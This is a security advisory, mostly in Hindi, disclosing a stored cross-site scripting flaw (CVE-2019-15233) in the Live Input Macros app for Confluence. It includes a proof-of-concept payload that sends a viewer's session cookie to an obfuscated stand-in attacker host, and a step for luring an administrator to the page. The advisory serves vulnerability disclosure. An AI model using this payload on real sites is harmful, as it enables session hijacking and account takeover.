
(FAB-2019-00157) मेरे द्वारा खोजी गई भेद्यता CVE-2019-15233
(FAB-2019-00157) मेरे द्वारा खोजी गई भेद्यता CVE-2019-15233
एडवाइजरी: एडवाइजरी
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
यह सुरक्षा भेद्यता FABMation GmbH के Francesco Emanuel Bennici [email protected] द्वारा पाई गई थी।
Live Input Macros उपयोगकर्ताओं को आपके Confluence पृष्ठों में चेकबॉक्स, रेडियो बटन, ड्रॉपडाउन सूचियाँ और बहुत कुछ जोड़ने तथा पृष्ठ को संपादित किए बिना परिवर्तन करने की सुविधा देता है।
यदि कोई उपयोगकर्ता दुर्भावनापूर्ण कोड जोड़ता है, तो एक हमलावर Confluence साइट पर JavaScript कोड निष्पादित कर सकता है।
इसका उपयोग किसी (जैसे) व्यवस्थापक के सत्र कुकी को चुराने के लिए किया जा सकता है (सत्र अपहरण)।
यह सामग्री कॉपी करें:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
और Confluence पृष्ठ पर एक नया तत्व बनाएं। इस टेक्स्ट को उसमें पेस्ट करें और Confluence पृष्ठ को (जैसे) किसी सिस्टम व्यवस्थापक के साथ साझा करें, और यदि वह साइट तक पहुँचता है, तो आप उसके सत्र को हाईजैक/ "कॉपी" कर सकते हैं।